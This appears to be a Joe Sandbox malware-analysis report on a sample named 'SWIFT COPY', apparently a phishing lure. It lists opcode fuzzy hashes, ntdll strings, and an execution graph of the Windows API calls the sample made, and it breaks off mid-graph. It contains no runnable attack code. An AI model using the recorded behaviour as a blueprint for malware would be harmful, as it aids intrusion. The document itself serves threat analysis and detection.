                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 711a6d73048025d13bdac3e6da5c206a8758d80386572bc25508e49b3c3cd644
                                                                                              • Instruction ID: 26c4f4ee0b3465d7a1b2dcf9cb734039464653bd5f714fc106ec017945999a78
                                                                                              • Opcode Fuzzy Hash: 711a6d73048025d13bdac3e6da5c206a8758d80386572bc25508e49b3c3cd644
                                                                                              • Instruction Fuzzy Hash: A490023520190402E100725C4848747500697D0306F95C051A5164559EC669C9956631
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23d7b0cce60aa037261960ad5c153dec1c284a1be9bb73f2be2a8750df672be7
                                                                                              • Instruction ID: 191db09ca55dc75f0737320ce6f773eca6c202beebf81ce1281d0674516ff2fb
                                                                                              • Opcode Fuzzy Hash: 23d7b0cce60aa037261960ad5c153dec1c284a1be9bb73f2be2a8750df672be7
                                                                                              • Instruction Fuzzy Hash: A390023520190402E100725C485470B500697D0306F95C051A1164559DC62989556671
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2ec87b8d81f021b3250bb20fafbcb82eb7b4d58764251dd795568bc53fc7e4cd
                                                                                              • Instruction ID: 4410aece0e157515a42d48c92c7f0d14f73ff8a6b9d5e9d239c3abcd7880c307
                                                                                              • Opcode Fuzzy Hash: 2ec87b8d81f021b3250bb20fafbcb82eb7b4d58764251dd795568bc53fc7e4cd
                                                                                              • Instruction Fuzzy Hash: A2900225211D0042E200766C4C54B07500697D0307F95C155A0154558CC91989655621
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e916f98cd2b5e8309f3a05c224f2e61e02416e85110212d6a8b85f98ca9d4814
                                                                                              • Instruction ID: c450dd27c4916c1ea90227399076696f38dbb4d047d634d44e26c03f640277cf
                                                                                              • Opcode Fuzzy Hash: e916f98cd2b5e8309f3a05c224f2e61e02416e85110212d6a8b85f98ca9d4814
                                                                                              • Instruction Fuzzy Hash: 6090022530150402E102725C4454606500AD7D1349FD5C052E1424559DC6298A57A232
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 22d65dbc3cb35e1205fe39aabcec745245ca3337099a9c0d0225587a399a65f3
                                                                                              • Instruction ID: de3dc9a81f979e600ae707cc9af8f076d1e6304020197cfdeaf7cfd2de14f68d
                                                                                              • Opcode Fuzzy Hash: 22d65dbc3cb35e1205fe39aabcec745245ca3337099a9c0d0225587a399a65f3
                                                                                              • Instruction Fuzzy Hash: E990027520150402E140725C4444746500697D0305F95C051A5064558EC65D8ED96765
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2915de3a87c3415fc6fe13c638f11b9878103f985fbdc9802ac9f937771039c2
                                                                                              • Instruction ID: a936f33580fc65171e26a4bdc611a59c8ac3415a6a2e296c240f4cad93a8cd0c
                                                                                              • Opcode Fuzzy Hash: 2915de3a87c3415fc6fe13c638f11b9878103f985fbdc9802ac9f937771039c2
                                                                                              • Instruction Fuzzy Hash: 7090022560150502E101725C4444616500B97D0345FD5C062A1024559ECA298A96A231
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4fa14d1285183020b0126408648f12fe5029108ea5209b41211ff3cb4c5705d5
                                                                                              • Instruction ID: 8123173a0bba171d775c6ae52ef827df9038ca96e69ff2d38190045c42d63e25
                                                                                              • Opcode Fuzzy Hash: 4fa14d1285183020b0126408648f12fe5029108ea5209b41211ff3cb4c5705d5
                                                                                              • Instruction Fuzzy Hash: 8F90026520190403E140765C4844607500697D0306F95C051A2064559ECA2D8D556235
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fdd692964a93281c48f13ae43f166bf3903cf8a376ecfa9969f52b124bcc323a
                                                                                              • Instruction ID: e59f2fd5cd8c97099f6ae4ff2100f3a0a9c5c089defb408c25e82da26cb9b239
                                                                                              • Opcode Fuzzy Hash: fdd692964a93281c48f13ae43f166bf3903cf8a376ecfa9969f52b124bcc323a
                                                                                              • Instruction Fuzzy Hash: 7190022520194442E140735C4844B0F910697E1306FD5C059A4156558CC91989595721
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c33edc35c9f32aacf859f46c184f9b896a47d91154b3b30069085470749e64ff
                                                                                              • Instruction ID: 6270e504156014843e26a18515772b080353a3312c4317dcf5dc67faddc241c6
                                                                                              • Opcode Fuzzy Hash: c33edc35c9f32aacf859f46c184f9b896a47d91154b3b30069085470749e64ff
                                                                                              • Instruction Fuzzy Hash: 9B90022524150802E140725C84547075007D7D0705F95C051A0024558DC61A8A6967B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8f43f63527320855286e8bccbcfbd037d77c8b98130e27f757c5092494e8aa81
                                                                                              • Instruction ID: f3973d50f154819889dc68381b57c71fc104404ffe1a87926feadcec8d215841
                                                                                              • Opcode Fuzzy Hash: 8f43f63527320855286e8bccbcfbd037d77c8b98130e27f757c5092494e8aa81
                                                                                              • Instruction Fuzzy Hash: 4890022524555102E150725C44446169006B7E0305F95C061A0814598DC55989596321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 203e166f6ccf4c72eb593465df50deb0e51bd681851adbba2cd4d2ccc45488a8
                                                                                              • Instruction ID: f01fdbec300fc50ec0ce52842bd3b85d4dffc9c1ea73041e372bda12c6dedcb1
                                                                                              • Opcode Fuzzy Hash: 203e166f6ccf4c72eb593465df50deb0e51bd681851adbba2cd4d2ccc45488a8
                                                                                              • Instruction Fuzzy Hash: 8C90023520250142E540735C5844A4E910697E1306BD5D455A0015558CC91889655321
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c4e7fd8b1ce81eb38fc70cd1de4ea3d933c45af354ae21bb88516431e0247446
                                                                                              • Instruction ID: 0b6234b0063267841b072a603353e0bba9ae76c406907db7c9c9888ad63d0567
                                                                                              • Opcode Fuzzy Hash: c4e7fd8b1ce81eb38fc70cd1de4ea3d933c45af354ae21bb88516431e0247446
                                                                                              • Instruction Fuzzy Hash: 6A90023920150402E510725C5844646504797D0305F95D451A042455CDC65889A5A221
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction ID: 591ad0d2e4758e0b81fe2ce38ac4425a8b26ac6f2eb2b288add2f838c6033286
                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction Fuzzy Hash:
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: d92bcccd85640859e996fe03ce542956450e4e262e10a84a9290312c635c0f28
                                                                                              • Instruction ID: e333b3761ff90b9f2a5ee217b121884658db347e16ed784e3dcd27a9f5c0519e
                                                                                              • Opcode Fuzzy Hash: d92bcccd85640859e996fe03ce542956450e4e262e10a84a9290312c635c0f28
                                                                                              • Instruction Fuzzy Hash: CC51E9B6A0011ABFDB21DB9C889097FFBF8FB092487548169F4A5D7641D338DE54CBA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 72206ab95083199f6f363f2e775078e5569028c994428690688886053dffc302
                                                                                              • Instruction ID: 76f04f98630897ae196f5679ee96f43361819252b2a514d5d228f493a7daf989
                                                                                              • Opcode Fuzzy Hash: 72206ab95083199f6f363f2e775078e5569028c994428690688886053dffc302
                                                                                              • Instruction Fuzzy Hash: 71512771A00769AECB34DF5CC99487FFBFCEB48208B048459E496D76C1E6B4EA008B60
                                                                                              Strings
                                                                                              • ExecuteOptions, xrefs: 013A46A0
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013A4742
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013A46FC
                                                                                              • Execute=1, xrefs: 013A4713
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013A4725
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 013A4787
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013A4655
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: 03b8fad483cfda1ff9ae21432ade82bc83e7dea4fede088eda522ba4b2133826
                                                                                              • Instruction ID: 509ee06940b61483d6c61f41dca989f004458c5af864d067e3ea6f7d1156e81f
                                                                                              • Opcode Fuzzy Hash: 03b8fad483cfda1ff9ae21432ade82bc83e7dea4fede088eda522ba4b2133826
                                                                                              • Instruction Fuzzy Hash: 9B513A3160021A7AEF25ABACDC85FFE7BACEF1431CF8440A9D605AB195E7719E418F50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction ID: 86f27e4e7d86800311f2250e9fe969ad2bd3b871c677e0a991e15bfa18467224
                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                              • Instruction Fuzzy Hash: 290236B1508342AFD306DF1AC490A6BBBF5EFD8714F01892EF9854B2A4DB31E945CB52
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction ID: 470b156cf234f08afcc079c49847853e6b6c16c9dab3c2851875f3defdd1f71d
                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                              • Instruction Fuzzy Hash: BC81C170E052899EEF358E6CC8917FEFFB5AF45328F184219D961A7299C73C9840CB61
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: 28c5ce875c19698058696f76d6f6de625824814ad1cc2b451c766f9f423aa4cd
                                                                                              • Instruction ID: cde21c3a4001a0db3a0fb1efe6b10d551d977032627b2230342c0ab67075aadc
                                                                                              • Opcode Fuzzy Hash: 28c5ce875c19698058696f76d6f6de625824814ad1cc2b451c766f9f423aa4cd
                                                                                              • Instruction Fuzzy Hash: 7B2135BAA00229ABDB11DF7DDC44AEF7BFCEF58658F440116E905E3240E735DA058BA1
                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 013A02BD
                                                                                              • RTL: Re-Waiting, xrefs: 013A031E
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 013A02E7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: dcc4e90e889269ff603df8c39a096385a4c50d065c77d49b6108b246f7b93b04
                                                                                              • Instruction ID: 002f0389849f4ec19e7709998b9949c16906c985a3468d9084fd588fb3dc9c32
                                                                                              • Opcode Fuzzy Hash: dcc4e90e889269ff603df8c39a096385a4c50d065c77d49b6108b246f7b93b04
                                                                                              • Instruction Fuzzy Hash: D2E1BF306047419FD765CF2CC884B6ABBE8FB84728F140A1DF9A58B6E1D774E944CB52
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 013A7B8E
                                                                                              • RTL: Re-Waiting, xrefs: 013A7BAC
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013A7B7F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 2edbee37509707ef1c0957d02d97a6d45f07e393d333342a3f5e97e10253dca5
                                                                                              • Instruction ID: 55b1460103fb33564f18e93f80f97f8e9040b9b894ecd13e9ca4563c6a40ccc2
                                                                                              • Opcode Fuzzy Hash: 2edbee37509707ef1c0957d02d97a6d45f07e393d333342a3f5e97e10253dca5
                                                                                              • Instruction Fuzzy Hash: 254105353007028FD725DE29CC40B66B7E9EF98718F004A2DFA5ADB694DB32E4098F91
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013A728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 013A72A3
                                                                                              • RTL: Re-Waiting, xrefs: 013A72C1
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013A7294
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 885266447-605551621
                                                                                              • Opcode ID: d9bad92fffbb93a9226d6c2ca22c0de84c08a6e84e2090d033e43c7208044240
                                                                                              • Instruction ID: 2883a186854c4be728b89df63716ee9d979b2499dd2ab2b967cd4e76a2bbb45b
                                                                                              • Opcode Fuzzy Hash: d9bad92fffbb93a9226d6c2ca22c0de84c08a6e84e2090d033e43c7208044240
                                                                                              • Instruction Fuzzy Hash: A3412431700206ABD721DE29CC81F66BBA9FF94718F104629F955EB644DB32F846CBD1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$]:%u
                                                                                              • API String ID: 48624451-3050659472
                                                                                              • Opcode ID: 59beedefae265c8de5dc244c4c47e5ea9fb3607fcee2552de405361c8b30dab8
                                                                                              • Instruction ID: bdf775bbe99453ee4a424fc81bc0a2472e20f974814c3299363d64a345543b75
                                                                                              • Opcode Fuzzy Hash: 59beedefae265c8de5dc244c4c47e5ea9fb3607fcee2552de405361c8b30dab8
                                                                                              • Instruction Fuzzy Hash: 89314172A003299EDB20DF2DCC44BEFB7FCEB54614F44455AE949E3240EB30AA448FA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-
                                                                                              • API String ID: 1302938615-2137968064
                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction ID: 1d2a52cd8d48fef0b9e6ffbbb2675245c71a229e305741b9cb1af660965615c2
                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                              • Instruction Fuzzy Hash: 9B91C271E0020A9BEF34DF6DC988ABEBBA5EF44328F14451AE955E76C0D7388941CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $$@
                                                                                              • API String ID: 0-1194432280
                                                                                              • Opcode ID: 5fb9d1e3cde89684f2b0ff4e2f967281e5b297e895065fcf7e08030375886aa0
                                                                                              • Instruction ID: 9f2e60689bb1b4be48d8826646e459a9a566ea70ef629ff417bf5432a5bbcd4a
                                                                                              • Opcode Fuzzy Hash: 5fb9d1e3cde89684f2b0ff4e2f967281e5b297e895065fcf7e08030375886aa0
                                                                                              • Instruction Fuzzy Hash: 42811B72D00669DBDB358F58CC44BEAB7B8AB48718F0041DAEA19B7680D7705E84CFA4

                                                                                              Execution Graph

                                                                                              Execution Coverage:2.5%
                                                                                              Dynamic/Decrypted Code Coverage:4.3%
                                                                                              Signature Coverage:1.6%
                                                                                              Total number of Nodes:444
                                                                                              Total number of Limit Nodes:74
                                                                                              execution_graph 100057 2879ec0 100058 2879ecf 100057->100058 100059 2879f10 100058->100059 100060 2879efd CreateThread 100058->100060 99674 2891980 99675 289199c 99674->99675 99676 28919d8 99675->99676 99677 28919c4 99675->99677 99684 2899630 99676->99684 99679 2899630 NtClose 99677->99679 99681 28919cd 99679->99681 99680 28919e1 99687 289b7e0 RtlAllocateHeap 99680->99687 99683 28919ec 99685 289964a 99684->99685 99686 2899658 NtClose 99685->99686 99686->99680 99687->99683 100066 289c7c0 100067 289b6c0 RtlFreeHeap 100066->100067 100068 289c7d5 100067->100068 100069 2899340 100070 28993f4 100069->100070 100072 289936c 100069->100072 100071 2899407 NtCreateFile 100070->100071 100073 28832c3 100074 2887f20 2 API calls 100073->100074 100075 28832d3 100074->100075 100076 2899630 NtClose 100075->100076 100077 28832ef 100075->100077 100076->100077 100078 287b6d0 100079 289b630 NtAllocateVirtualMemory 100078->100079 100080 287cd41 100079->100080 100081 28872d0 100082 28872ec 100081->100082 100086 288733f 100081->100086 100084 2899630 NtClose 100082->100084 100082->100086 100083 2887471 100085 2887307 100084->100085 100091 28866f0 NtClose LdrInitializeThunk LdrInitializeThunk 100085->100091 100086->100083 100092 28866f0 NtClose LdrInitializeThunk LdrInitializeThunk 100086->100092 100088 288744e 100088->100083 100093 28868c0 NtClose LdrInitializeThunk LdrInitializeThunk 100088->100093 100091->100086 100092->100088 100093->100083 99688 2898c90 99689 2898caa 99688->99689 99692 3092df0 LdrInitializeThunk 99689->99692 99690 2898ccf 99692->99690 99693 2899590 99694 2899604 99693->99694 99696 28995b8 99693->99696 99695 2899617 NtDeleteFile 99694->99695 99697 2895b90 99698 2895bf5 99697->99698 99699 2895c2c 99698->99699 99702 28913b0 99698->99702 99701 2895c0e 99703 289134c 99702->99703 99704 28913c2 99702->99704 99707 289b630 99703->99707 99706 2891361 99706->99701 99710 2899790 99707->99710 99709 289b661 99709->99706 99711 2899825 99710->99711 99713 28997bb 99710->99713 99712 2899838 NtAllocateVirtualMemory 99711->99712 99712->99709 99713->99709 99714 2891d10 99715 2891d29 99714->99715 99716 2891d74 99715->99716 99719 2891db7 99715->99719 99721 2891dbc 99715->99721 99722 289b6c0 99716->99722 99720 289b6c0 RtlFreeHeap 99719->99720 99720->99721 99725 2899980 99722->99725 99724 2891d84 99726 289999a 99725->99726 99727 28999a8 RtlFreeHeap 99726->99727 99727->99724 100094 3092ad0 LdrInitializeThunk 99728 288292a 99730 2882963 99728->99730 99731 2886460 99728->99731 99732 288646a 99731->99732 99733 28864b7 99732->99733 99738 28991c0 99732->99738 99733->99730 99735 28864da 99735->99733 99736 2899630 NtClose 99735->99736 99737 288655c 99736->99737 99737->99730 99739 28991dd 99738->99739 99742 3092ca0 LdrInitializeThunk 99739->99742 99740 2899206 99740->99735 99742->99740 99743 2879f20 99746 287a1ba 99743->99746 99745 287a54d 99746->99745 99747 289b320 99746->99747 99748 289b346 99747->99748 99753 2874120 99748->99753 99750 289b352 99751 289b38b 99750->99751 99756 2895800 99750->99756 99751->99745 99760 28833d0 99753->99760 99755 287412d 99755->99750 99757 2895862 99756->99757 99759 289586f 99757->99759 99778 2881bb0 99757->99778 99759->99751 99761 28833ea 99760->99761 99763 2883400 99761->99763 99764 289a060 99761->99764 99763->99755 99766 289a07a 99764->99766 99765 289a0a9 99765->99763 99766->99765 99771 2898ce0 99766->99771 99769 289b6c0 RtlFreeHeap 99770 289a11f 99769->99770 99770->99763 99772 2898cfa 99771->99772 99775 3092c0a 99772->99775 99773 2898d23 99773->99769 99776 3092c1f LdrInitializeThunk 99775->99776 99777 3092c11 99775->99777 99776->99773 99777->99773 99779 2881be8 99778->99779 99794 2888030 99779->99794 99781 2881bf0 99782 2881ec0 99781->99782 99805 289b7a0 99781->99805 99782->99759 99784 2881c06 99785 289b7a0 RtlAllocateHeap 99784->99785 99786 2881c17 99785->99786 99787 289b7a0 RtlAllocateHeap 99786->99787 99789 2881c28 99787->99789 99793 2881cbf 99789->99793 99816 2886bc0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99789->99816 99791 2881e72 99812 2898140 99791->99812 99808 2884700 99793->99808 99795 288805c 99794->99795 99817 2887f20 99795->99817 99798 2888089 99800 2888094 99798->99800 99801 2899630 NtClose 99798->99801 99799 28880a1 99802 2899630 NtClose 99799->99802 99803 28880bd 99799->99803 99800->99781 99801->99800 99804 28880b3 99802->99804 99803->99781 99804->99781 99828 2899940 99805->99828 99807 289b7bb 99807->99784 99809 2884724 99808->99809 99810 288472b 99809->99810 99811 2884766 LdrLoadDll 99809->99811 99810->99791 99811->99810 99813 28981a2 99812->99813 99814 28981af 99813->99814 99831 2881ed0 99813->99831 99814->99782 99816->99793 99818 2887f3a 99817->99818 99822 2888016 99817->99822 99823 2898d70 99818->99823 99821 2899630 NtClose 99821->99822 99822->99798 99822->99799 99824 2898d8a 99823->99824 99827 30935c0 LdrInitializeThunk 99824->99827 99825 288800a 99825->99821 99827->99825 99829 289995a 99828->99829 99830 2899968 RtlAllocateHeap 99829->99830 99830->99807 99847 2888300 99831->99847 99833 2881ef0 99834 288244a 99833->99834 99851 2891340 99833->99851 